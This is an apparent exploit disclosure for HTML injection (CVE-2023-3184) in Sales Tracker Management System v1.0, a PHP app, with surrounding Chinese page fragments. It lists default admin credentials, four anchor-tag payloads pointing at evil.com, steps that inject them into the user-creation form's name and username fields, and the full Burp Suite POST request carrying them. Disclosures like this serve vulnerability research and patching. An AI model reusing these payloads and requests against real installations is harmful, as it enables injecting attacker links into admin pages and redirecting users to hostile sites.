扫码分享
验证:
体验盒子Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://www.sourcecodester.com/>
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184
==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123
=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
===============================
STEPS_TO_REPRODUCE
===============================
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVENCREDENTIALS OF ADMIN
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user`
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename``lastname` and in `username`
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USERIS ADDED.
6. AFTER CLICKING ON THEEACH PAYLOAD IT REDIRECT ME TO EVIL SITE
==========================================
BURPSUITE_REQUEST
==========================================
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua:
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"
<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"
<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"
<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"
<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"
1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"
2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary7hwjNQW3mptDFOwo--
===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md
体验盒子
